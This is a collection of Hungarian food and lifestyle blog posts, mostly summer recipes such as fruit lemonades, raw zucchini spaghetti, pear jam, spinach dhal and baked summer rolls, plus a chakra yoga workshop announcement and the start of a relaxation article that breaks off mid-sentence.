Elcukrozott piros limonádé :)
Mikor az ilyen melegben az ember nyelve is kilóg, és még a gyerek is önmagától marad árnyékban, a maradék gondolatok között málna és citromfagyi villan fel, hűs tengervíz, meg a nagy diófa árnyéka. No itt egyik sem volt, csak unatkozó kölyök, lihegő anya, leeresztett redőnyök melletti 27,5 C fok a földszinten, fel meg nem mertünk... Gyors segítség egy kis jeges gyümölcskoktél volt. Persze a lentiek szabadon variálhatók ízlés szerint. Inkább ötletadók, mint receptek. Ha nem akarunk sokat pancsolni, érdemes előre kicsavarni egy decinyi citrom és lime levet, azután beleönteni egy jégkockatartóba és betenni a mélyhűtőbe. Amikor szükségünk van rá, csak elővesszük belőle néhány kockát, és pár perc alatt készen van egy kis frissesség. Ráadásul csak némileg hűti le a folyadékunkat, ami azért valljunk be nem jó túlzásba vinni. Amikor őszibarack szezon van, és viszonylag olcsón jutunk hozzá, szoktunk befőttnek eltenni de csak a saját levében. Télen barackkrémleveshez, vagy ilyenkor nagyon alkalmas felbontani egy üveggel és összeturmixolva gyümölcslének használni. Semmiféle bolti nem vetekszik vele. Férj fotózott, megjegyzett, és fenyegetett: megjegyzésben jól leírja, hogy sok cukrot használok. :) Tény, hogy az övé édesebb lett, mint az enyém, de most-már tudom, hogy elég egy kávéskanálnyi gyümölcscukor is a 3 decis poharába. Két 3 dl-es pohárba került a következő: Piros gyümölcsös limonádéhoz: fél pohár fagyasztott bogyós gyümölcs, esetleg meggy 4 dl 100%-os gyümölcslé (nálunk almás meggy) 1/2 lime leve és húsa 1/2 citrom leve és húsa 2 kk gyümölcscukor (elhagyható) 2-4 kocka jég kevés víz mentalevél Lime-os limonádéhoz: 1 citrom leve 1 lime leve 1 tk gyümölcscukor mentalevél leheletnyi só Citrusos változathoz: 6 nagy narancs leve vagy 4 dl 100%-os gyümölcslé 1/2 lime leve és húsa 1/2 citrom leve és húsa 2 kk gyümölcscukor (elhagyható) 2-4 kocka jég kevés víz díszítéshez 2 karika lime Őszibarackos változat: 4 nagy őszibarack összeturmixolva vagy befőtt 1/2 lime leve és húsa (elhagyható) 1/2 citrom leve és húsa 2 kk gyümölcscukor (elhagyható) 2-4 kocka jég kevés víz
Kajsziparfé
Honnan ered a sárgabarack szó, és honnan a kajszi? Mi a különbség közöttük? Igazából semmi, ugyanarról a gyümölcsről van szó. Mégis van valami különleges vonása, mégpedig az, hogy kajszinak több köze van a szilvához, mint az őszibarackhoz. Miért hívjuk baracknak mégis? Aprócska tévedés ez a részünkről, és nem véletlen, hogy a világ többi nyelvén két teljesen külön szó használatos erre a két gyümölcsre. Akkor már inkább hívjuk sárgaszilvának! :) A kajszi szó amúgy török eredetű, a barack pedig görög. Az előbbit a török hódoltság idején kezdték nálunk termeszteni, így jött vele a neve is. A(z őszi) barack pedig görög szó, ami latin, német és szláv közvetítéssel jutott el hozzánk. Így azt lehet mondani, hogy ez a két gyümölcs szépen leírja a minket körbeölelő népek sokaságát.
E kis bevezető után pedig jöjjön a FAGYI, ahogy a Kertkonyha facebook oldalán nemrég megszavaztatok.
Hozzávalók 2-3 adaghoz:
[...] Bővebben!
Málnás gombóc
Valamilyen nyers gombócot beszéltünk a lányokkal, mondtam, olyan töltelékkel lesz, amit kapok a piacon ;) Azt hiszem, megalkottam életem legfinomabb édességét ;) <3 Hozzávalók a gombóctésztához: 2 csésze (kb 5 dl) áztatott dió 1 csésze áztatott szotyi 2 ek zabpehely 5 szem aszalt füge 1 leheletnyi tiszta só 2 ek méz 1/2 biocitrom leve és […]
Karfiol-karalábé pörkölt
Miért együnk karalábét? Jelentéktelennek tűnő kis zöldség, amit legtöbbször levesbe főznek a háziasszonyok (esetleg főzeléket készítenek belőle). Amit biztosan tudni lehet róla, hogy fogyókúrázóknak remek rágcsálnivaló önmagában is ez a növényi rostban gazdag káposztaféle. Mondhatnám, hogy a zöldségek banánja, hiszen magas káliumtartalma miatt sószegény és energiaszegény diétába alkalmazzák. Kálium mellett magnézium-, jód-, kén-, szelén-, mész- és foszfortartalma is van. Levele pedig vasban gazdag, ezért is ajánlott pl. zöld turmixot készíteni belőle. Ha zsengén jutunk hozzá, és lehetőségünk van rágcsálni, jót teszünk vele fogainknak. Gyerekeknek is már egész korán (amikor már fogazata van) bevezethetjük, hogy inkább karalábét rágcsáljon, mint az édességekre, nyalókákra, cukorkákra szokjon rá. Salátákba is beépíthetjük. Karfiollal párosítva pedig akár egy kiadós zöldségpörköltet is készíthetünk belőle.
A recept:
Hozzávalók:
- 1-2 karalábé
- 1 kisebb karfiol
- 1 hagyma
- ételízesítő
- fokhagyma
- őrölt fűszerpaprika
- őrölt köménymag
- őrölt bors vagy borsikafű
- víz
- esetleg növényi tej (1-2dl)
Elkészítés:
Egy közepes fej hagymát apróra vágunk és egy teflon bevonatú (nem kötelező, de ajánlott) edényben alacsony lángon egy kevés vízen elkezdjük párolni. (Egészségesebb vízzel készíteni, mint olajon pirítani.) Közben felkockázzuk a korábban meghámozott karalábét és leveleitől megfosztott karfiolt. (Mindkettő leveleit felhasználhatjuk zöld turmixhoz) Amikor a hagyma megpárolódott, hozzáadjuk a felkockázott zöldségeket. Jöhet bele a kevés ételízesítő - keverés, majd színezéshez úgy egy csapzott kanálnyi piros paprika, és kb. 1 - 2 dl víz. A főzés utolsó 10 percében apróra vágott, vagy szétpréselt fokhagyma és egy leheletnyi őrölt köménymag, esetleg őrölt bors vagy borsikafű. Közepes lángon főzzük egészen addig, míg roppanósra megpuhulnak a zöldségek. Fogyasztható tésztával, rizs-félékkel, akárcsak egy másik pörkölt. Ha megfelelő köretet választunk (pl. rizs vagy hajdina), gluténmentes ételben lehet részünk. Lágyabbá tehetjük a fűszeres ízét, ha a főzés végén egy kevés növényi tejet adunk hozzá. Könnyed nyári étel, ami aránylag gyorsan elkészül. Valamilyen salátával fogyasztva az esetleges puffadást is elkerülhetjük
Főzésmentes cukkini "spagetti bolognai mártással", a tökéletes kánikula étel (gluténmentes, laktózmentes, tojásmentes, nyers, vegán)
főzésmentes cukkini "spagetti bolognai mártással" (mindenmentes, nyers, vegán) A cukkini és én 28 évig nem voltunk barátságban. Nagyon kevés zöldség került gyermekkorunkban az asztalunkra, és a cukkini egyáltalán nem tartozott még azon kevesek közé sem. Majd az önnállósodás kezdetén, zsenge felnőtt éveimben sem igazán értettem mire jó ez az ízetlen, enyhén szivacsos állagú, semmire nem használható zöldség?! Szerencsére pár éve, miután tényleg nyitott lettem a sokkal több zöldség fogyasztásra, és elkezdtem kutakodni, hogy mi mire is való, és milyen formában lehet fogyasztani, megláttam a cukkini igazi arcát! :-) Valahogy úgy történt, mint az avokádóval. Rájöttem, hogy nem önmagában csodálatosak ezek az ételek, hanem tökéletes kiegészítői más zöldségeknek, gyümölcsöknek. Alapjául szolgálnak salátáknak, főételeknek, turmixoknak, de még édességeknek is! Ők a növény világ kaméleonjai! :-) Azóta elválaszthatatlanok vagyunk, és minden nagy bevásárláskor kerül a kocsiba 1-2 db cukkini. Főleg a nyár nagy slágere, de szinte egész évben képviselteti magát a boltokban, a zöldségtársadalom eme kiemelkedő szereplője. Fogyaszthatjuk főzve, sütve, párolva, rántva, grillezve, de akár nyersen is! Formájának és szilárdságának köszönhetően, számtalan alakban felhasználhatjuk pl.: karikázva, csíkozva, hajóként, spiralizálva, kockázva, reszelve, vékony lapokként, chipsként stb. (A Pinteresten rengeteg cukkinis képet találhattok, ha beírjátok a "zucchini recipes" szavakat a keresőmezőbe.) főzésmentes cukkini "spagetti bolognai mártással" (mindenmentes, nyers, vegán) A Zöld Avocado gasztroblogon készítettem már nektek mosolygós cukkinis tócsnit, grilleztünk már cukkini karikákat az ízletes kéksajtos amaránt golyók mellé, építettünk céklás-kecskesajtos-cukkinis tornyot a vendégeknek, de dobtam már fel a hagyományos krumplipürét és rizst is nyers reszelt cukkinivel. Rengeteg recept van még a tarsolyomban, melyben megismerkedhettek ennek az olcsó zöldségnek, az értékes oldalaival. Azt hiszem ilyenkor szokták azt mondani, hogy nagyszerű ár-érték arányú termékről van szó. :-) Aki eddig idegenkedett tőle, bátran merem ajánlani, hogy tegye meg a kezdő lépéseket a cukkini felé, mert nem fogja megbánni! ;-) Miért is érdemes cukkinit fogyasztani? "A cukkini 95%-a szöveti víz: kiválóan pótolja a szervezet vízszükségletét. Sokféle ásványi anyagot (mangán, kálcium, magnézium, kálium, réz, foszfor, cink) és vitamint (A, B1, 2, 6, 9) tartalmaz. Folsavban és élelmi rostban gazdag. Antioxidáns anyagai révén kimutatható módon csökkenti a káros sejtmutációk előfordulását. Enyhe hashajtó, gyulladásgátló és vértisztító. Béta-karotin és C-vitamin tartalmánál fogva védi az érfalat. Csökkenti az asztma, a csont-ízületi és a reumatikus gyulladások kockázatát. Csökkenti a prosztata problémák esélyét." Forrás: Tudatosvásárló főzésmentes cukkini "spagetti bolognai mártással" (mindenmentes, nyers, vegán) A mai recept, amit hoztam nektek, nem az én találmányom. Az internet telis tele van, jobbnál jobb cukkini spagetti receptekkel. Én először Lénárt Gitta oldalán találkoztam vele, de azóta már rengeteg variációt láttam külföldi és magyar oldalakon is. Valószínűleg sokan közületek már szintén találkoztak a nyers cukkini "spagetti bolognai mártással" recepttel, így nektek ez a bejegyzés nem fog új ötlettel szolgálni, csak emlékeztet titeket arra, hogy ebben a nyári kánikulában milyen jól tud esni, egy folyadékban gazdag, roppanós, friss és energiadús cukkini spagetti?! Nem kell hozzá befűteni a konyhát, hisz, minden nyers benne, nagyon gyorsan és egyszerűen elkészül. Akár kempingezés közben, vagy a tóparti faházban is elkészíthetjük a családnak a nyaralás alatt. Vitaminban, ásványi anyagokban gazdag, könnyen emészthető, mindenmentes, ízletes, zamatos saláta, ami fehérjetartalmának és magas víztartalmának köszönhetően egy fő étkezést is kiválthat a nagy melegben. :-) Hozzávalók: főzésmentes cukkini "spagetti bolognai mártással" (mindenmentes, nyers, vegán) HOZZÁVALÓK (2 főre): - 1 db nagyobb cukkini - 3 db közepes méretű, érett paradicsom - 1/2 kisebb lila hagyma - 2 gerezd fokhagyma - 1 bögre dió (előző éjjel beáztatva) - 1-1 marék fenyőmag, tökmag, napraforgómag - 1 közepes sárgarépa - 4 db friss bazsalikom levél - 1/2 citrom leve - Himalája só, frissen őrölt fekete bors - 3 ek sörélesztőpehely - (csíra, kendermag, avokádó, friss petrezselyem, aszalt sós magos kréker, vagy puffasztott kukorica tallér - opcionális) főzésmentes cukkini "spagetti bolognai mártással" (mindenmentes, nyers, vegán) ELKÉSZÍTÉS: A nyers cukkinit alaposan mossuk meg, vágjuk le a kemény végét, majd csíkozzuk fel, amilyen keskeny csíkokra csak tudjuk. Ez lesz a "spagetti tésztánk". :-) Minél vékonyabb, annál jobb! A profik ezt egy ún. spiralizáló konyhai eszközzel készítik, amivel gyorsan és egyszerűen, gyönyörűszép cukkini spirálokat lehet készíteni. Nekem ilyen segítőtárs nincs a konyhámban (egyenlőre), ezért marad a kézi szeletelés. :-) Sózzuk be, és hagyjuk állni egy fél órát. Ettől megpuhul a cukkini, és könnyebb lesz vele bánni. Közben készítsük el a többi hozzávalót. A diót áztassuk be előző éjszaka, majd öntsük le róla az áztató lét. (Így sokkal könnyebben megemészthető.) Daráljuk le az ázott diót a fokhagymával. Ez lesz a "darált hús". A dió magas fehérjetartalmának köszönhetően tökéletesen helyettesíti a húst az ételben. A paradicsomokat a lila hagymával, a sárgarépával, sóval és borssal turmixoljuk le. Ez lesz a "bolognai szósz" paradicsomos alapja. A friss bazsalikom leveleket zúzzuk szét egy mozsárban, vagy vágjuk apróra egy olló segítségével, és keverjük a paradicsom szószba. hozzávalók a nyers cukkini spagettihez, bolognai mártással Gyakorlatilag kész is az étel. Szedjük ki a tányérra a cukkini spagettit, majd rá a paradicsomszószt, és a darált diót ("darált húst"). Az egészet szórjuk meg tetszés szerinti mennyiségben és összetételben sós magvakkal (pl.: 1 ek fenyőmag, 1 tk napraforgómag, és 1 tk tökmag). Végezetül, hogy az ízélményt és a tápértéket növeljük, szórjunk az étel tetejére "reszelt sajtot", amit a sörélesztő pehely helyettesít ebben a nyers vegán ételben. A sörélesztő pehely sajtszerű íze tökéletesen illeszkedik a spagettinkhez. (Én tettem még hozzá csírát és magas fehérjetartalmú kendermagot is, de ezek elhagyhatóak.) főzésmentes cukkini "spagetti bolognai mártással" (mindenmentes, nyers, vegán) Tápanyagban, frissességben, és üdeségben gazdag jó étvágyat kívánunk a nyári melegben is! ;-) Ha úgy érzed (főleg a férfiak), hogy ettől nem fogsz jól lakni, akkor ropogtass mellé puffasztott tallérokat (pl.:kukorica tallér), vagy aszalt sós krékereket. De ne tévesszenek meg a nyers alapanyagok! Elméletben csak egy saláta, a gyakorlatban azonban egy nagyon jól összerakott, teljesértékű étel, amitől nem maradunk éhesek! :-) Megjegyés: Ha szeretnétek még több nyers, friss, energiadús, tápanyagban gazdag, lédús saláta receptet amivel a tikkasztó melegben táplálhatjátok a testeteket, akkor nézzetek körül a blogon a "Saláták" menü pont alatt. Sütésmentes desszertekért pedig írjátok be a keresőbe a "nyers" szót. főzésmentes cukkini "spagetti bolognai mártással" (mindenmentes, nyers, vegán)
Egyszerű natúr körtelekvár
Balatonon jártunk, ahol szállásadónknak volt egy hatalmas körtefája, amiről csak úgy potyogtak a körték. Napjában kétszer-háromszor is felszedtük a puha fűből a gyümölcsöket, míg egy egész rekesszel simán tele lett. Elhozhattuk a körtéket, ott - érthetetlen módon - nem nagyon kell a tulajdonosnak. Így esett, hogy körtelekvárt főztem be. Óóó, hogy mennyire finom, és mennyire egyszerű! A körte, ahogy az alma is eleve tartalmaz pektint, így zselésíteni nem szükséges. A körték pedig magukban is finom édesek, meglepetésemre semmivel nem kellett édesíteni. Tehát semmi adalékanyagot nem tartalmaz ez a lekvár. Cukor, édesítő, tartósító, zselésítő nélkül készült.
A recept:
Hozzávalók:
- nyári körte
- víz
- üvegek
- befőzési fólia
Elkészítés:
Mint minden befőzés, úgy ez is két nélkülözhetetlen alappal indul.
- A gyümölcsök alapos átmosása (többszöri vízben, a körték háromszor is megfürödtek jó hideg vízben), és természetesen az esetleges rossz szemek kiválogatása
- Az üvegecskék előkészítése. A következő hadművelettel érdemes ezt végezni:
Keressünk néhány elfekvőben lévő lehetőleg csinosabb üveget. Győződjünk meg arról, hogy a kupakok épek és rozsda, karcmentesek. Mossuk el őket, ha szükséges, forró mosogatószeres vízben áztassuk le a címkéket. Miután kívül belül a kupakokat és üvegeket eltisztítottuk, fogjunk egy nagyobb tepsit. Helyezzük az üvegeket és a fedőket a tepsibe. Engedjünk vizet mindegyik üvegbe kb. félig, valamint a tepsibe is öntsünk valamennyi vizet. Sütőbe rakva addig melegítsük, míg az üvegekben a víz forrni kezd. Amikor már felforrt a víz mindegyik üvegben, kivehetjük a sütőből. Fontos, hogy ezt vízforralós tevékenységet már akkor csináljuk, amikor szinte kész a lekvárunk. Ugyanis a felforrósított, átsterilizált üvegekbe szinte azonnal tölthetjük a lekvárokat.
A lekvár elkészítése:
Miután alaposan átmostuk az összes körtét, kettő vagy négy részre vágjuk őket, majd odatesszük főzni. Az edény aljába kb. 1-2 dl vizet öntünk, megakadályozva, hogy a gyümölcs leégjen. Kevés párolás után, átkeverjük, s ha úgy látjuk, hogy puhultak a körtedarabok, botturmix segítségével pürésítjük. Lehet teljesen sima püré, vagy ha szeretjük a gyümölcsdarabos lekvárt, akkor lazábban turmixoljuk. Amikor rotyog a gyümölcsszósz, a lekvár el is készült. Az üvegeket az alábbiak alapján megtöltjük:
A felforralt üvegekből még szinte forró állapotukban kiöntjük a vizet és a helyére az elkészült lekvárt töltjük. A megtöltött üvegek tetejére fóliát teszünk. A fedőt alaposan rácsavarjuk majd előkészített meleg helyre fejjel lefelé állítjuk.
A meleg hely jelen esetben nyári takaró és törölköző párost jelentette egy tiszta lavorban. De máskor már rekeszbe is tettem, doboz sem megvetendő. A lényeg, hogy ezt a "melegdunszt" helyet előbb kell elkészíteni. Az idő alatt, míg a lekvár a tűzön rotyog. Miután fejjel lefelé az összes üveget a száraz, meleg helyre állítottuk, lefedjük őket, hogy melegen tartsuk és így várjuk meg, míg kihűlnek az üvegek. Legalább 24 óra kell nekik. Szóval ellenőrizni ráér másnap. Ha már hidegek az üvegek, akkor érdemes felcímkézni őket, majd pedig hideg, sötét helyen (Pl. pince vagy kamra) tárolni.
Spenótos dhal édesburgonyával
A vöröslencse talán a legjellegzetesebb indiai étel, melyet a március 15-i elefántos felvonulásokon úgy szoktak emlegetni: "nemzeti dhal". Ezzel szemben az édesburgonya az indiai receptekben ritka, mint a hímezett ütvefúró, így a "tradicionális" jelzőt ezen étel esetében el is hagyhatjuk. (Azok legnagyobb örömére, akik nem tudják, mit jelent.) Szerencsére tudósok bebizonyították: attól hogy valami nem tradicionális, még lehet finom. Sőt, az, hogy valami hagyományos, önmagában egyáltalán nem garantálja, hogy finom is. Példának a mongol népviseletet hozták fel. És most szakma:
Elmélyülten előkészíti az alábbiakat:
2 db közepes méretű édesburgonya 500 g vöröslencse 2 kiskanál kurkuma 1/2 kiskanál asafoetida 2 db babérlevél 1 fej lilahagyma 2 gerezd fokhagyma 1 db vöröschili összetörve 2 kiskanál garam masala 3-4 cm gyömbér lereszelve 2 marék spenótlevél pár szál koriander felaprítva só, bors A sütőt ellentmondást nem ismerően előmelegítjük 200 fokra. A megpucolt édesburgonyát szeletekre/hasábokra vágjuk, majd forró vízben félig megfőzzük. Egy tepsibe olívaolajat öntünk, pár percre a sütőbe helyezzük, hogy az olaj felforrósodjon. Ha megvan, beletesszük az édesburgonyát némi só és bors társaságában, és 20 percig sütjük. Eközben a lencsét jó 6 dl vízben, közepes lángon jó negyed óráig főzzük. Ha a víz már felforrt, hozzáadjuk a kurkumát, az asafoetidát, a babérlevelet, majd pár perc elteltével mehet a spenót is. Amíg elkészül, a harmadik fronton is sütési folyamatokat gerjesztünk: egy serpenyőben olajat hevítünk, beletesszük a felcsíkozott hagymát, belenyomjuk a fokhagymát, és hozzáadjuk a gyömbért, a chilit és a garam masalát. A megsült édesburgonyát ebbe az elegybe helyezzük, majd anélkül, hogy összetörnénk, elképesztő bravúrral beleforgatjuk. Ezt és az elkészült dhalt és megsózzuk, majd lelkiismeret-furdalás nélkül tálaljuk.
Fűszeres-bundás nyári tekercs, házi paradicsomos mártogatóssal (gluténmentes, laktózmentes, tojásmentes, vegán)
Fűszeres-bundás nyári tekercs, házi paradicsomos mártogatóssal (gluténmentes, laktózmentes, tojásmentes, vegán) Egy ismerősöm teljesen oda van a puffasztott kölesgolyókért, amiket filmnézés közben szoktak jóízűen nassolni. Én is kedvet kaptam, hogy megkóstoljam ezeket a roppanós pufikat. :-) Mivel az ehhez hasonló ételeket és alapanyagokat online rendelem, ezért első nekifutásra is több zacskóval kértem. Most már tudom, hogy nem kellett volna, mert, ahogy mondani szokták, "ízlések és pofonok", nálunk nem lett népszerű a natúr kölesgolyó... puffasztott kölesgolyók Elkezdtem hát törpölni rajta, hogy mit is kezdhetnék velük, hogyan használhatnám fel őket valamelyik receptben?! Sokat gondolkoztam, míg rájöttem, hogy gluténmentes panírban fogom felhasználni a kölesgolyóimat! :-) Oké, de mit panírozzak be??? Körbe néztem a konyhámban, hogy milyen maradékok vannak, amiket sürgősen el kéne fogyasztani, mielőtt kimásznak a hűtőből, vagy lejár a szavatosságuk. Nem szeretek ételt kidobni, hisz nélkülünk is hatalmas étel pazarlás megy nap, mint nap a világban. :-( (Erről láthattok is egy nagyon jó kis videót "Friss és máris a szemétben" címmel a Youtube-on.) fűszeres - bundás nyári tekercs (mindenmentes)A konyhai kutakodás eredménye: fáradt zöldségek, és egy csomag rizslap. Ebből pedig egyértelmű, hogy vietnámi nyári tekercs fog készülni, de kölesgolyós gluténmentes panírban! :-) Már a gondolat is felcsigázott, mert tudtam, hogy valami különleges, finom, egészséges, és tápláló fog belőle megszületni, habár azzal is tisztában voltam, hogy ez nem egy pikk-pakk kész gyors étel. És így is lett! Hosszú órákat álltam a konyhában, de megérte, mert nagyon finom és tálpláló ebéd lett belőle, amit akár ételallergiás vendégek elé is nyugodt szívvel tehetünk, mert rendhagyó glutén-, tojás-, és laktózmentes panírt kaptak a tekercsek. ;-) A fűszeres-bundás nyári tekercs mellé készült egy házi paradicsomos mártogatós, és az egészet egy friss, ropogós saláta ágyon tálaltam. Íme egy egyszerű, könnyen emészthető, tápláló, egészséges, de időigényes mindenmentes, vegán recept! :-) Fűszeres-bundás nyári tekercs, házi paradicsomos mártogatóssal (gluténmentes, laktózmentes, tojásmentes, vegán) HOZZÁVALÓK: (kb.10 tekercshez) nyári tekercsekhez: Akármilyen otthon található zöldségből elkészíthetjük a tölteléket. Nekem most ez volt itthon: 1/2 sárga kaliforniai paprika 1/2 piros kaliforniai paprika 1/2 zöld kaliforniai paprika 5 szem retek 2 marék fodros kel 2 szál tavaszi hagyma 1 érett avokádó frissen őrölt fekete bors, Himalája só 1 zacskó rizslap (kb.22 cm átmérőjű) mindenmentes panírhoz: rizs liszt (vagy egyéb gluténmentes liszt) 4 bögre puffasztott natúr kölesgolyó (A bejegyzés alján, a "Megjegyzés" rovatban találsz még más gluténmentes "zsemlemorzsa" variációkat.) vegán tojás: 1 ek lenmagliszt és 5 ek víz keveréke + 1 dl tiszta víz (ha nem fontos, hogy tojásmentes legyen az étel, használhatunk hagyományos tojást is) fűszerek tetszés szerinti mennyiségben: chilipor, fehér őrölt bors, Himalája só (én jó fűszeresre készítettem) 2 marék szezámmag paradicsomos mártogatóshoz: 300 g érett paradicsom 1 ek édesítő (pl.: eritrit, vagy nyírfacukor) 1 tk Himalája só 4 gerezd fokhagyma 1 ek kókusz olaj 1 ek szárított olasz fűszerkeverék vagy oregánó 1 dl tiszta víz zöldség szivárvány ELKÉSZÍTÉS: A tölteléknek szánt zöldségeket felaprítjuk apró kockákra, majd jól összekeverjük a fűszerekkel. A rizslapokat "kifőzzük" a csomagoláson előírt módon, majd gyorsan megtöltjük a fűszeres zöldséges töltelékkel, és feltekerjük. (Ez a rizslap készítés nem is olyan egyszerű, mint, aminek látszik. Itt egy kis képpel illusztrált segítség, hogy hogyan is lehet a legegyszerűbben elkészíteni őket.) Ha sikerül selejtet gyártanunk, ne dobjuk ki azt sem, mert bepanírozva és kisütve, a paradicsomszószba mártogatva nagyon finom rizsgömbőcöket készíthetünk belőlük. ;-) Fűszeres-bundás nyári tekercs, házi paradicsomos mártogatóssal (mindenmentes Tehát készen vannak a nyers zöldséggel töltött rizslapok, amiket már önmagában is el lehet fogyasztani. Akár itt meg is állhatunk, ha nem szeretnénk bundával ellátni a vietnámi nyári tekercseket. Így is nagyon finom, és mivel a töltelékként felhasznált zöldségek nyersek, ezért sokkal több vitamint, ásványi anyagot, tápanyagot és energiát tartalmaznak, mint a későbbi bundás és sütött testvéreik. nyári tekercs (gluténmentes, laktózmentes, tojásmentes, vegán) Ha azonban tovább megyünk, akkor készítsük elő a mindenmentes panírozáshoz szükséges alapanyagokat. Egy tálba tegyünk rizslisztet (vagy más gluténmentes lisztet), egy másik tálba keverjük ki a vegán tojást (ha nem szeretnénk tojást használni.). Ehhez 1 ek lenmaglisztet keverjünk össze 5 ek tiszta vízzel (süteményekbe kevesebb víz is elég), és hagyjuk 5 percet állni. Ez a keverék elkezd kocsonyásodni, és tojásszerűen nyúlni fog. Keverjünk hozzá 1 dl tiszta vizet, vagy növényi tejet (pl.:rizstejet). Az egészet keverjük alaposan el (mint mikor felverjük a tojást). A panírozáshoz szükséges harmadik tálba pedig daráljuk le a puffasztott kölesgolyókat, keverjük hozzá a szezámmagot, és a fűszereket (chili, bors, só). Kész a három mindenmentes panír hozzávaló, most már csak meg kell forgatni a tekercseket bennük, bundázzuk a megszokott módon. A kész fűszeres-bundás tekercseket kisüthetjük forró olajban is a hagyományos módon, de én inkább az olajkímélő, kalóriabarát, sütőben sült verziót választom ezúttal is. Egy kevés kókusz olajjal (elhagyható) meglocsolhatjuk a panírozott tekercseket, és tegyük őket egy sütőpapíron a 220 °C -ra előmelegített sütőbe. Légkeverésesen 15 percig süssük az egyik oldalt, majd 10 percig grillezős módban a másik oldalt. Így enyhén aranybarna, ropogós, de mégis puha tekercseket kapunk. Fűszeres-bundás nyári tekercs, házi paradicsomos mártogatóssal (gluténmentes, laktózmentes, tojásmentes, vegán) Míg sülnek a tekercsek, készítsük el a házi paradicsomos mártogatóst, ami megadja a "hab a tortán" érzést ennél a rendhagyó ételnél. Turmixoljuk le a nyers p aradicsomokat. Egy kevés forró kókusz olajon futassuk meg a préselt fokhagymákat, majd adjuk hozzá a paradicsom turmixot, az édesítőt, a sót, 1 ek szárított olasz fűszert, és 1 dl tiszta vizet. Az egészet főzzük kevergetés mellett addig, amíg be nem sűrűsödik (kb.20 perc). Miután jönnek a finom illatok, és elkészült a paradicsom szósz, tegyük félre a meleg lapról, és hagyjuk hűlni pár percet. Végül kézi botmixerrel krémesítsük. Friss és ropogós saláta ágyon, házi paradicsom szósszal tálalhatjuk is a bundás és fűszeres zöldséges tekercseinket! Fűszeres-bundás nyári tekercs, házi paradicsomos mártogatóssal (gluténmentes, laktózmentes, tojásmentes, vegán) Képzelőerőben gazdag, élménydús konyhai ténykedést, és finom, de tápláló végeredményeket kívánok! Jó étvágyat hozzá! :-) Megjegyzés1: Természetesen gluténmentes panírt nem csak kölesgyolyókból készíthetünk. Használhatunk piritósként megszárított, majd ledarált gluténmentes kenyeret is, mint zsemlemorzsa. Natúr kukorica pelyhet is alkalmazhatunk gluténmentes bundának. Engedjük el a fantáziánkat, és hagyjuk, hogy az alapanyagok kilépjenek a megszokott szerepeikből, a tradíciókból! Erről szól a reform étkezés! Légy kreatív, és rugalmas! ;-) Megjegyzés2: "A nyári tekercset (vagy másként, a vietnámi tekercset), a kínai konyhából ismert tavaszi tekercstől alapvetően az különbözteti meg, hogy nem búzalisztből készült tésztába göngyölik a változatos tölteléket, hanem leheletvékony rizstésztalapba. A vékony rizspapírba (praktikusan így hívják a szárított, vékony, rendszerint körlappá nyújtott tésztát) tekert zöldségeket, fűszernövényeket, rákokat, halakat, esetleg húst és természetesen halszószt, üvegtésztát és fűszereket tartalmazó tekercs nyersen éppúgy asztalra kerül, mint forró, bő zsiradékban kisütve. A nyers változatot gyakran az asztalnál ülők készítik el ízlésük szerint az előre kikészített töltelékek közül válogatva. A rizspapírt természetesen minden esetben vízbe kell áztatni, hogy megpuhuljon, és némi gyakorlást igényel, míg szép szabályosra sikerülnek a rendkívül ízletes és egészséges tekercsek." Forrás: Mindmegette
Csakrajóga workshop Szegeden
2015. június 26. Lét-tudatos konyha
- Kapcsolódásunk az Univerzummal a csakrákon keresztül. - Szervezetünk erősítése az egyes csakrákhoz kapcsolódó betegségekkel szemben. - A csakrákhoz kapcsolódó életterületek erősítése. Gyökércsakra (1-es csakra) Ennek a csakrának a működése az életenergiával függ össze. Ha ritkán aktiváljuk ezt a csakrát, akkor állandóan energiahiánnyal küszködünk. A Gyökércsakrához kapcsolódó fizikai betegségek: hát- és gerincfájdalmak, tartáshibák, aranyér-székrekedés-hasmenés, veseproblémák; lelki problémák: alvászavarok, depresszió, önhibáztatás, pénzhez fűződő problémák. A workshop helyszíne: Szeged-Tompasziget, árnyas nyírfákkal körülvett, pozitív energiákat sugárzó hely. Ára: 3000 ft Időpont: 2015. július 4. szombat 9-12h Bővebb információ és jelentkezés: renata.kalman@lettudatos.com vagy 06 30 913 6576
Nyers meggyleves zabtejszínnel krémesítve, banánnal sűrítve
Főként nyáron szeretem a nyersen készített ételeket.
Az alábbi meggylevest sem főztem, nagyon finom lett.
Sűríthető chia maggal is.
Hozzávalók kb. egy tányér leveshez: 1 nagyobb marék magozott meggy, kb. fél dl zabtejszín, fél banán, édesítő ízlés szerint (xilit, eritritol, stevia, agavé szirup, méz), díszítéshez: menta vagy citromfű levél, feketeribizli
Elkészítés: A meggyet a zabtejjel és banánnal, valamint az édesítővel összeturmixoljuk, tányérba borítjuk, díszítjük gyümölcsökkel, meglocsoljuk egy kis zabtejszínnel, és már tálalhatjuk is.
Jó étvágyat!
Relaxáció - a hatékony stresszkezelés
2015. június 25. Élj harmóniában
Hullapóz (savászana) - relaxáció A mai kor emberének komoly gondot jelent a túlpörgetett, feszültségekkel teli létezés. A stressz a szervezet vészreakciója a ,,fuss vagy küzdj állapot teljesen kimeríti a szervezetet és nagyon sok feszültséget halmoz fel a fizikai testben és az elmében is. Szinte mindenki szeretne valamilyen módon megszabadulni a stressztől. Amikor valaki ara gondol, hogy lazítani szeretne, akkor sokszor választ olyan tevékenységeket, amelyek ugyan elterelik a gondolatait a hétköznapi problémákról, de az elme és test nem tud kikapcsolódni (pl. tv, mozi, baráti összejövetel, szórakozóhely, alkoholfogyasztás). A valójában vágyott nyugodt, ellazult állapotot a relaxáció segítségével tudjuk elérni. A relaxáció teljes ellazulást, elengedést jelent. A relaxáció az egyik legjobb módszer arra, hogy megszabadulj a feszültségektől és stressz okozta kimerültségtől. Ez egy olyan hatékony módszer, amely segít kikapcsolni a hétköznapokból, elcsendesíti az elmét és oldja a testből a feszültségeket, segítségével megszabadulhatunk a dühtől, agressziótól, félelmektől, szorongástól. A rendszeres relaxáció nem csak ellazítja a testet és energiával tölt, de segít abban is, hogy a hétköznapokban rugalmasabbak, nyugodtabbak, nyitottabbak legyünk és ellenállóbak a napi problémákkal szemben. A relaxációt a jógában azért is alkalmazzuk, mert fontos szerepe van az elme nyugalmának. Ahhoz, hogy elkezdj jógát gyakorolni a legjobb ha a fizikai test nincs tele feszültségekkel és az elméd nyugodt. Ez a nyugalom segít abban, hogy az ászanákban, légző gyakorlatokban és a meditációban el tudj mélyedni. A jógagyakorlás akkor tud igazán hatékony lenne, ha nyugodt elmével végezzük. A relaxáció önmagában is 